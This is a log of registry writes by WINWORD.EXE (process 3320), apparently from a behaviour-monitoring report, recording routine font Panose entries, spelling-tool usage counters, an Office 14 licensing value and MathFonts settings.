HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimSun-ExtB
02010609060101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimSun-ExtB
02010609060101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Tai Le
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Shonar Bangla
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Yi Baiti
03000500000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Sans Serif
020B0604020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Aparajita
020B0604020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Ebrima
02000000000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gisha
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kokila
020B0604020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Leelawadee
020B0502040204020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Uighur
02000000000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MoolBoran
020B0100010101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Utsaah
020B0604020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vijaya
020B0604020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Andalus
02020603050405020304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arabic Typesetting
03020402040406030203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Simplified Arabic
02020603050405020304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Simplified Arabic Fixed
02070309020205020404
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sakkal Majalla
02000000000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Traditional Arabic
02020603050405020304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Aharoni
02010803020104030203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
David
020E0502060401010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FrankRuehl
020E0503060101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Levenim MT
02010502060101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Miriam
020B0502050101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Miriam Fixed
020B0509050101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Narkisim
020E0502050101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rod
02030509050101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FangSong
02010609060101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@FangSong
02010609060101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimHei
02010609060101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
KaiTi
02010609060101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@KaiTi
02010609060101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
AngsanaUPC
02020603050405020304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Browallia New
020B0604020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
BrowalliaUPC
020B0604020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
CordiaUPC
020B0304020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DilleniaUPC
02020603050405020304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
EucrosiaUPC
02020603050405020304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FreesiaUPC
020B0604020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
IrisUPC
020B0604020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
JasmineUPC
02020603050405020304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
KodchiangUPC
02020603050405020304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
LilyUPC
020B0604020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DFKai-SB
03000509000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@DFKai-SB
03000509000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans Unicode
020B0602030504020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Black
020B0A04020102020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Candara
020E0502030303020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Comic Sans MS
030F0702030302020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Consolas
020B0609020204030204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Constantia
02030602050306030303
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Corbel
020B0503020204020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Medium
020B0603020102020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gabriola
04040605051002020D02
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Georgia
02040502050405020303
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Palatino Linotype
02040502050505030304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe Print
02000600000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Trebuchet MS
020B0603020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Verdana
020B0604030504040204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Webdings
05030102010509060703
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MT Extra
05050102010205020202
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Arial Unicode MS
020B0604020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings 2
05020102010507070707
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings 3
05040102010807070707
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Book Antiqua
02040602050305030304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century Gothic
020B0502020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Haettenschweiler
020B0706040902060204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Outlook
05010100010000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Narrow
020B0606020202030204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Garamond
02020404030301010803
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Monotype Corsiva
03010101010201010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Algerian
04020705040A02060702
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Baskerville Old Face
02020602080505020303
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bauhaus 93
04030905020B02020C02
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bell MT
02020503060305020303
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Berlin Sans FB
020E0602020502020306
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bernard MT Condensed
02050806060905020404
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Poster Compressed
02070706080601050204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Britannic Bold
020B0903060703020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Broadway
04040905080B02020502
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Brush Script MT
03060802040406070304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Californian FB
0207040306080B030204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Centaur
02030504050205020304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Chiller
04020404031007020602
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Colonna MT
04020805060202030203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cooper Black
0208090404030B020404
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Footlight MT Light
0204060206030A020304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Freestyle Script
030804020302050B0404
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Harlow Solid Italic
04030604020F02020D02
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Harrington
04040505050A02020702
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
High Tower Text
02040502050506030303
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Jokerman
04090605060D06020702
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Juice ITC
04040403040A02020202
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kristen ITC
03050502040202030202
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kunstler Script
030304020206070D0D06
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Bright
02040602050505020304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Calligraphy
03010101010101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Fax
02060602050505020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Handwriting
03010101010101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Magneto
04030805050802020D02
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Matura MT Script Capitals
03020802060602070202
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mistral
03090702030407020403
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Modern No. 20
02070704070505020303
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Niagara Engraved
04020502070703030202
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Niagara Solid
04020502070702020202
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Old English Text MT
03040902040508030806
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Onyx
04050602080702020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Parchment
03040602040708040804
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Playbill
040506030A0602020202
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Poor Richard
02080502050505020702
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Ravie
04040805050809020602
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Informal Roman
030604020304060B0204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Showcard Gothic
04020904020102020604
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Snap ITC
04040A07060A02020202
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Stencil
040409050D0802020404
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tempus Sans ITC
04020404030D07020202
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Viner Hand ITC
03070502030502020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vivaldi
03020602050506090804
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vladimir Script
03050402040407070305
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wide Latin
020A0A07050505020404
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT
020B0602020104020603
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT Condensed
020B0606020104020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Script MT Bold
03040602040607080904
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell Extra Bold
02060903040505020403
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell Condensed
02060603050405020104
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell
02060603020205020403
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rage Italic
03070502040507070304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Pristina
03060402040406080204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Perpetua Titling MT
02020502060505020804
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Perpetua
02020502060401020303
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Papyrus
03070502060502030205
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Palace Script MT
030303020206070C0B05
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
OCR A Extended
02010509020102010303
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Maiandra GD
020E0502030308020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans Typewriter
020B0509030504030204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans
020B0602030504020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Imprint MT Shadow
04020605060303030202
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Goudy Stout
0202090407030B020401
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Goudy Old Style
02020502050305020303
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gloucester MT Extra Condensed
02030808020601010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans Ultra Bold Condensed
020B0A06020104020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans Ultra Bold
020B0A02020104020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT Condensed
020B0506020104020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT
020B0502020104020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT Ext Condensed Bold
020B0902020104020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gigi
04040504061007020D02
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
French Script MT
03020402040607040605
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Medium Cond
020B0606030402020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Heavy
020B0903020102020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Demi Cond
020B0706030402020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Demi
020B0703020102020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Book
020B0503020102020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Forte
03060902040502070203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Felix Titling
04060505060202020A04
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Medium ITC
020B0602030504020804
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Light ITC
020B0402030504020804
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Demi ITC
020B0805030504020804
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Bold ITC
020B0907030504020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Engravers MT
02090707080505020304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Elephant
02020904090505020303
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Edwardian Script ITC
030303020407070D0804
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Curlz MT
04040404050702020202
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Copperplate Gothic Light
020E0507020206020404
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Copperplate Gothic Bold
020E0705020206020404
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century Schoolbook
02040604050505020304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Castellar
020A0402060406010301
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Calisto MT
02040603050505030304
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bradley Hand ITC
03070402050302030203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bookman Old Style
02050604050505020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Condensed
02070606080606020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Black
02070A03080606020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT
02070603080606020203
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Blackadder ITC
04020505051007020D02
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Rounded MT Bold
020F0704030504030204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Agency FB
020B0503020202020204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bookshelf Symbol 7
05010101010101010101
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Reference Sans Serif
020B0604030504040204
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Reference Specialty
05000500000000000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Berlin Sans FB Demi
020E0802020502020306
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT Condensed Extra Bold
020B0803020202020204
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831845
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831846
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831845
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831846
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831862
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831863
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831847
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831848
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831847
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831848
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831864
3320
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831865
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
019C826E445A4649A5B00BF08FCC4EEE
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
0
3320
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
0
3320
WINWORD.EXE
write
